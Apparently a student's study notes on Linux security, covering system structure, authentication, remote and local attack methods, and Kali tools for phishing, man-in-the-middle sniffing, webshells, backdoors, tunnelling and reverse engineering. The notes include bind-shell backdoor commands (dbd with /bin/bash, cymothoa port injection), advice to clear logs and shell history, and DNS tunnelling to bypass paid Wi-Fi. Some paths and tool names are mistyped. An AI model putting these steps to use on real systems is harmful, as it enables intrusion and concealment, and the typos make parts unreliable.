Chapter 8 Security Attack and Defense of Linux Operating System
1.1 Overview of the basic framework of the Linux operating system
1.1.1 Development and Status Quo of Linux Operating System
On the basis of the unified kernel code base, the Linux open source community has also developed a large number of operating system distributions according to the needs of different user groups. The popular ones include Ubuntu, Debian, Fedora, CentOS, RHEL, OpenSUSE, and Slackware. The reason why the Linux operating system has become one of the most concerned systems is that it is open source and free.
1.1.2 Advantages of Linux
①Cross-platform hardware support (most of the Linux operating system kernel is written in C language, and adopts the portable UNIX standard application program interface)
②Rich software support
③ Multi-user multi-tasking (multiple users can use the computer system at the same time in the way of network connection)
④Reliable security (using Linux's own firewall, intrusion detection and security authentication and other tools, and timely patching system loopholes, can greatly improve the security of Linux system)
⑤Good stability (The Linux kernel source code is optimized for a standard 32-bit computer (64-bit on a 64-bit CPU) to ensure the stability of the system)
⑥Perfect network function
1.1.3 Linux system structure
A complete operating system based on the Linux kernel is called the Linux operating system. The structure of the Linux operating system includes the Linux kernel, some GNU runtime libraries and tools, a command-line shell, a graphical interface X window system and the corresponding desktop environment, and contains thousands of Application software from office packages, compilers, text editors, scientific tools to web services. The overall structure of the Linux operating system kernel belongs to a typical macro-kernel structure, not the micro-kernel structure adopted by Minix, the precursor of Linux. In the Linux kernel, various device drivers at the hardware abstraction layer can fully access hardware devices, easily set up in a modular form, and can be loaded or unloaded directly through the LKM mechanism during system operation. Above the hardware abstraction layer is the kernel service function module, including five subsystems of process management, memory management, file system, device control and network; and these kernel modules pass the system call interface to the user-mode GNU runtime library, tools, and commands. Line Shell, X window and application software to provide services.
1.2 Security Mechanism of Linux Operating System
1.2.1 The core security mechanism of the Linux operating system
Authentication, authorization and access control, security auditing.
1.2.2 Linux Authentication Mechanism
Linux is a multi-user and multi-task operating system. It implements user identity management by creating users and user groups of various role types to ensure that multiple users use the Linux operating system safely.
1.2.3 Linux users
In the Linux system, the user is the main body of the execution process to complete the specific operation task: ①Root user ②Ordinary user ③System user. Linux user information is stored in the /etc/password file of the system, including username, unique uid for each user, Shell type used, user initial directory, etc. The encrypted password is stored in the /etc/shadow file, only Readable to Root.
1.2.4 Linux User Group
A Linux user group is actually a collection of user accounts with the same characteristics, which is used to simplify the user rights management of the entire system. The Linux user group information is stored in the /etc/group file of the system, including the user group name, the user group gid and the list of user names contained in the user group, and the user group encryption password is stored in the /etc/gshadow file. You can use the id-a command to query and display the groups to which the current user belongs, add user groups through the groupadd command, and use usermod-G group_name user name to add users to a specific group.
1.3 Linux system remote attack and defense technology
1.3.1 The main methods of invading Linux systems on remote networks
① Guessing attack on user passwords involved in the authentication process of various network services of Linux system
②Explore and exploit a security vulnerability of a monitoring network service in the Linux system to provide attackers with access to the local shell
③Through web Trojan horses, sending fraudulent emails, providing Trojan horse programs and other technical and social engineering means
④ When the Linux system is used as a router connecting multiple networks, or a listener for network sniffing in "promiscuous mode" is turned on, it may be attacked by packets specially constructed by the attacker, so that the attacker can obtain access rights.
1.3.2 Automated remote password guessing tools
①Brutus: Known as the fastest and most flexible remote password guessing and cracking tool
②THC Hydra: a very fast network identification password guessing cracking tool
③Cain and Abel: "Black Realm God Soldier", also has very good support for SSH under Linux and remote password guessing of various network application services
1.3.3 Linux network service remote penetration attack
Linux system security vulnerabilities, penetration attacks and patch update process Remote penetration attacks on Linux system network services The network protocol stack in the Linux kernel implements the network service FTP in the LAMP Web site construction solution. File sharing services such as Samba Email sending and receiving services Other network services
1.3.4 Security precautions against network service remote penetration attacks
① Disable all unnecessary network services
②Try to choose more secure network protocols and service software, and deploy them using best security practices
③ Update the network service version in time
④Use xinetd and firewall to add network access control mechanism for Linux network services
⑤ Establish an intrusion detection and emergency response planning process
1.4 Local Security Attack and Defense Technology of Linux System
1.4.1 Linux Local Privilege Escalation
When the root privilege is required to configure and manage the system, use the su or sudo command to elevate to the root user account. After an attacker gains access to a local limited user, the easiest way to escalate privileges is to crack the root user's password, and then execute the su or sudo command to escalate. Reading the password ciphertext file /etc/shadow itself requires the attacker to have Root privileges. By exploiting some arbitrary file read/write vulnerabilities in services running with Root privileges, an attacker can still obtain the /ect/shadow file first, and then escalate his authority to a root privileged user by cracking the password. The second way to escalate privileges is to discover and exploit security holes in the su or sudo program. The most popular way for attackers to escalate local privileges on Linux systems is to directly attack arbitrary code execution vulnerabilities in programs with root privileges, allowing them to open shell command-line connections with root privileges for the attacker. According to the type of the attacked target program, this kind of approach is divided into attacking user mode SUID privilege escalation vulnerability and attacking Linux kernel code privilege escalation vulnerability. Network services and programs with the SUID bit set in the user mode can be elevated to the permissions of the file during operation to perform some system resource-related operations. The last local privilege escalation technique takes advantage of some misconfiguration in the system. By searching the system for sensitive file and directory locations that are globally writable and exploiting them, an attacker with only the privileges of the first user may allow the operating system or privileged programs Do something they expect to gain an opportunity for privilege escalation.
1.4.2 Disappearance on Linux system
Clean up the system log, effectively erasing the traces of your actions. Check the /etc/syslog.conf configuration content to see what type of audit events the system is currently implementing and where the logs are stored. Also clean up the history of commands entered in the shell program.
Kali Video Learning (31-35)
Vulnerability of SET
The Social Engineering Toolkit (SET) is an open-source, Python-driven social engineering penetration testing tool. Provides a very rich library of attack vectors. is an open source social engineering exploit kit, usually used in conjunction with metasploit.
Enter 1, press enter
1. Spear phishing attacks
2. Website Attack
3. Medium infection attack
4. Create Payload and listen
5. Mass email attack
6. Arduino-based attack
7. SMS Spoofing Attack
8. Wireless access point attack
9. QR code attack
10. Powershell attack
11. Third-party modules
Sniffing spoofing and man-in-the-middle attacks
The man-in-the-middle attack routine under Linux is the same. Here are the methods for ARP spoofing, DNS spoofing and sniffing, and session hijacking.
Enable port forwarding for Kali settings
Set up ssltrip and let sslrtip listen on port 8081
Configuration of ettercap: The configuration file is /etc/ettercap/etter.conf, first of all, both ec_uid and ec_gid should be changed to 0
Remove the comment from the line if you use iptables under the Linux category below, save and exit
Open the graphical interface ettercap -G
Select the default eth0 for the sniffing network card
Open ettercap, select sniff option-unified sniffing-select network card-hosts option: scan for hosts first, and select host list after scanning
Permission maintenance backdoor
Permission maintenance includes three subclasses of Tunnel toolset, Web backdoor, and system backdoor. The system backdoor and the web backdoor are collectively referred to as backdoors, which are malicious programs left behind to facilitate re-entry into the system after penetration testing.
1. WEB backdoor
(1)Weevely
Weevely is a webshell tool written in python (integrating webshell generation and connection, only for safe learning and teaching, illegal use is prohibited), it can be regarded as a kitchen knife replacement tool under linux (limited to php), a certain Some modules are not available on win.
Generate a php backdoor, weevely generate test ~/1.php, test is the password, and generate ~/1.php locally
The backdoor is uploaded to the web and connected using weevely
(2)WeBaCoo(Web Backdoor Cookie)script-kit
is a small, stealthy PHP backdoor that provides a terminal that can connect to a remote web server and execute PHP code. WebaCoo uses HTTP response headers to transmit command results, and shell commands are base64 encoded and hidden in cookies.
2. System backdoor
(1) Cymothoa system backdoor
cymothoa -10500 -s -0 -y 2333 (inject 2333 port), if successful, you can connect to 2333 port and return a shell
(2) dbd is understood as the encrypted version of nc
Listening side: dbd -l -p 2333 -e /bin/bash -k password
Attacker: dbd 127.0.0.1 2333 -k password
(3) The usage of sbd and dbd is the same
(4) U3-Pwn
A tool used in combination with Metasploit Payload, the menu can be single-handedly multi-targeted for mobile optical drive devices such as optical drive images, U disks, etc.
(5)Intersect
Execute the backdoor and execute 1.py -b on the target machine to generate a bind shell backdoor. If the remote host and remote port have been set before, they can also be set to reverse shell. At this time, the connection to the backdoor port is successful and the shell is returned.
Tunnel for Privilege Maintenance
Permission maintenance includes three subclasses of Tunnel toolset, web backdoor, and system backdoor. The Tunnel toolset contains a series of tools for establishing communication tunnels and proxies:
Room 1 Room Miredo
Miredo is a network tool, mainly used for IPV6 Teredo tunnel links of BSD and Linux. It can convert network connections that do not support IPV6 to IPV6. IPV6 and TUN tunnel support are required in the kernel.
(2)DNS2TCP
DNS tunnel is DNS tunnel. From the name point of view, it uses the DNS query process to establish a tunnel to transmit data.
In public places such as hotels, there is usually a wifi signal, but when you visit the first website, a window may pop up, you need to enter the user name and password, and then you can continue to surf the Internet after logging in (this technology is generally a transparent http proxy). However, sometimes it is found that the obtained dns address is valid and can be used for dns query. At this time, DNS tunnel technology can be used to achieve free Internet access.
DNS tunnel principle
Through a specific server, let the DNS server in the local area network realize data forwarding for us. There are many tools implemented by DNS tunnel, such as: OzymanDNS, tcp-over-dns, heyoks, iodine, dns2tcp
(3)iodine
(4)Proxychains
A tool is often used in intranet penetration testing. For example, we use Meterpreter to open a Socks4a proxy service. By modifying the /etc/prosychains.conf configuration file and adding a proxy, other tools such as sqlmap and namp can directly use the proxy to scan the internal network. network.
Such as proxychain namp 10.0.0.1/24
(5) Proxy tunnel
Proxytunnel can connect to a remote server through a standard Https proxy, which is a proxy that implements the function of bridging. Specifically for Http(s) transport over SSH
Prosytunnel can be used to:
create a communication channel using an http(s) proxy (http connect command)
write a client driver for OpwnSSH and create an http(s) proxy over SSH connections
as a Standalone application that can connect to remote servers
(6) Ptunnel
Tunnel communication with ICMP packets
(7)Pwant
Communication via UDP under the intranet
(8) sslh
A ssl/ssh port multiplexing tool, sslh can accept https, ssh and openvpn connections on the same port. This makes it possible to connect to ssh server or openvpn server through port 443 and provide https service on this port. sslh can be used as an example to study port multiplexing.
reverse engineering tools
Reverse engineering is to deduce a specific implementation method through analysis based on existing things and results. For example, seeing someone else's exe program can make some kind of beautiful animation effect, you can analyze the realization process of its animation effect through methods such as disassembly, decompilation and dynamic tracking. This behavior is reverse engineering; not only Is to decompile, but also to pull out the design, and document, the purpose of reverse software engineering is to make the software maintainable.
(1) Edb-Debugger
EDB (Evan's Debugger) is a binary debugging tool developed based on Qt4, mainly to be in line with the OllyDbg tool. The function can be expanded through the plug-in system. Currently, only Linux is supported.
(2) Ollydbg
's classic Ring3-level debugger is a dynamic debugging tool that combines IDA with SoftICE. Under Kali is Ollydbg running in Wine mode
(3)jad
Java decompilation tool
(4) Playback2
is an open source reverse engineering platform that disassembles, debugs, analyzes and manipulates binary files
(5)Recstudio2
A decompilation tool
(6) Apktool
The APK compilation tool provided by GOOGLE can decompile and recompile apk, install the framework-res framework required by the decompile system apk, and clean up the last decompiled folder.
7 Clang 、 Clang ++
Clang is a lightweight compiler for C, C++, Objective-C, and Objective-C++ languages, similar to the gcc compiler.
Clang++ is another upgraded version of clang. The usage is actually the same, similar to the gc++ compiler.
(8)D2j-des2jar
Disassemble the dex file into a jar file, and then use other tools to view the source code
(9)Flasm
Mainly used to directly modify the script actionscript in the swf file. The software for converting swf to fla files cannot guarantee 100% restoration. If you only modify the as script code, flasm is the best choice, because it only modifies the script and does not modify the resource data.
